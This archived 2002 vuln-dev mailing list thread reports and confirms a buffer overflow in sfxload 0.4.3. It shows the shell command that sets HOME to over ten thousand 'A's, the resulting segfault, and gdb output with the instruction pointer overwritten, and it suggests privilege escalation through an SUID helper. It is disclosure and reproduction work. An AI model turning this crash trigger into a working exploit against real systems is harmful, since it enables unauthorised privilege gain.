Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: Re: sfxload issues.

Re: sfxload issues.

From: Gabriel A. Maggiotti <gmaggiot_at_ciudad.com.ar>
Date: Thu, 3 Jan 2002 17:53:30 -0300

I successfully reproduced it in my box

<qoute>
[root_at_tribilin /root]# cat /etc/issue

Red Hat Linux release 7.0 (Guinness)
Kernel 2.2.16-22 on an i586

[root_at_tribilin /root]# export HOME=`perl -e 'print "A" x 10235'`
[root_at_tribilin /root]# ./sfxload
Segmentation fault (core dumped)
</quote>

                                                                 Regards,
Gabriel A. Maggiotti

Email: gmaggiot_at_ciudad.com.ar
Webpage: http://qb0x.net

----- Original Message -----
From: "l0rt" <simon_at_snosoft.com>
To: <vuln-dev_at_securityfocus.com>
Sent: Wednesday, January 02, 2002 5:53 PM
Subject: sfxload issues.

>
> Vendor : http://members.tripod.de/iwai/awedrv.html
> Program: sfxload
> OS : RH 7.1
> Version: 0.4.3
> SUID : No
> SGID : No
> Issue : This may get called by an suid helper binary which would allow
> a normal user to gain some more privs.
>
> --------------------------------------------------------------------------
>
> Details:
> [raven] /u1/cores/testing/bin> export HOME=`perl -e 'print "A" x 10235'`
>
> /* I just set HOME to be [10235] A's */
>
> [raven] /u1/cores/testing/bin> sfxload
> Segmentation fault (core dumped)
>
> /* When xfsload is run it reads in the HOME var and cores!!! */
>
> [raven] /u1/cores/testing/bin/sfxload> gdb /bin/sfxload /* gdb */
> GNU gdb 5.0rh-5 Red Hat Linux 7.1
> Copyright 2001 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and you
> are
> welcome to change it and/or distribute copies of it under certain
> conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB. Type "show warranty" for
> details.
> This GDB was configured as "i386-redhat-linux"...(no debugging symbols
> found)...
> (gdb) core core
> Core was generated by `AAAAAAAA'.
> Program terminated with signal 11, Segmentation fault.
> Reading symbols from /lib/i686/libm.so.6...done.
> Loaded symbols for /lib/i686/libm.so.6
> Reading symbols from /lib/i686/libc.so.6...done.
> Loaded symbols for /lib/i686/libc.so.6
> Reading symbols from /lib/ld-linux.so.2...done.
> Loaded symbols for /lib/ld-linux.so.2
> #0 0x41414141 in ?? ()
> (gdb) bt
> #0 0x41414141 in ?? ()
> Cannot access memory at address 0x41414141
> (gdb)
>
> /* EIP gets killed */
>
>
>
>
> --
> Regards,
> l0rt
>
> ------------------------------------------------------------
> "The only way to get rid of temptation is to give in to it."
>
>
Received on Jan 03 2002

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos